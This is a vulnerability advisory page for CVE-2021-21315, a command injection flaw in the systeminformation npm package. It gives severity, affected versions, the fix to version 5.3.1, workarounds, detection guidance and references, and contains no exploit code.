CVE-2021-21315 – CVE-2021-21315 is a command injection vulnerabi... (How to Fix)

Q: What is the severity of CVE-2021-21315?

CVE-2021-21315 has a CVSS score of 7.1 (HIGH). CVE-2021-21315 is a command injection vulnerability in the systeminformation npm package that allows attackers to execute arbitrary commands on affected systems. It affects Node.js applications using vulnerable versions of this library to retrieve system information. The vulnerability can be exploited through specific functions like si.inetLatency() when untrusted input is passed as parameters.

📋 TL;DR

CVE-2021-21315 is a command injection vulnerability in the systeminformation npm package that allows attackers to execute arbitrary commands on affected systems. It affects Node.js applications using vulnerable versions of this library to retrieve system information. The vulnerability can be exploited through specific functions like si.inetLatency() when untrusted input is passed as parameters.

💻 Affected Systems

Products:

systeminformation npm package

Versions: All versions before 5.3.1

Operating Systems: All platforms where Node.js runs

Default Config Vulnerable: ⚠️ Yes

Notes: Only vulnerable when using specific functions (inetLatency, inetChecksite, services, processLoad) with untrusted input parameters.

📦 What is this software?

Cordova by Apache

View all CVEs affecting Cordova →

Systeminformation by Systeminformation

View all CVEs affecting Systeminformation →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full remote code execution leading to complete system compromise, data theft, and lateral movement within the network.

🟠

Likely Case

Limited command execution within the application's context, potentially allowing file system access, data exfiltration, or further exploitation.

🟢

If Mitigated

No impact if input validation/sanitization is properly implemented or if vulnerable functions aren't used with untrusted input.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires the application to call vulnerable functions with attacker-controlled input. Public proof-of-concept exists in advisory references.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5.3.1

Vendor Advisory: https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v

Restart Required: Yes

Instructions:

1. Update package.json to require systeminformation version 5.3.1 or higher. 2. Run 'npm update systeminformation'. 3. Restart all Node.js applications using this package.

🔧 Temporary Workarounds

Input validation and sanitization

all

Validate that parameters passed to vulnerable functions are strings only, reject arrays or objects

🧯 If You Can't Patch

Implement strict input validation for all parameters passed to si.inetLatency(), si.inetChecksite(), si.services(), and si.processLoad() functions
Avoid using these vulnerable functions with any user-controlled or untrusted input sources

🔍 How to Verify

Check if Vulnerable:

Check package.json or node_modules/systeminformation/package.json for version below 5.3.1

Check Version:

npm list systeminformation

Verify Fix Applied:

Verify systeminformation version is 5.3.1 or higher in package.json and node_modules

📡 Detection & Monitoring

Log Indicators:

Unusual command execution patterns from Node.js processes
Error logs showing command injection attempts in systeminformation functions

Network Indicators:

Unexpected outbound connections from Node.js applications
DNS requests to suspicious domains from application processes

SIEM Query:

process.name:node AND (command_line:*systeminformation* OR command_line:*inetLatency* OR command_line:*inetChecksite*)

📊 Metadata

CVE ID: CVE-2021-21315

CVSS v3 Score: 7.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

CWE: CWE-78

Published: February 16, 2021

Last Updated: October 24, 2025

🔗 References

https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525 Patch
https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v Third Party Advisory
https://lists.apache.org/thread.html/r8afea9a83ed568f2647cccc6d8d06126f9815715ddf9a4d479b26b05%40%3Cissues.cordova.apache.org%3E Issue Tracking,Mailing List
https://security.netapp.com/advisory/ntap-20210312-0007/ Third Party Advisory
https://www.npmjs.com/package/systeminformation Product
https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525 Patch
https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v Third Party Advisory
https://lists.apache.org/thread.html/r8afea9a83ed568f2647cccc6d8d06126f9815715ddf9a4d479b26b05%40%3Cissues.cordova.apache.org%3E Issue Tracking,Mailing List
https://security.netapp.com/advisory/ntap-20210312-0007/ Third Party Advisory
https://www.npmjs.com/package/systeminformation Product
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21315 US Government Resource

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-21315, you might also want to check these: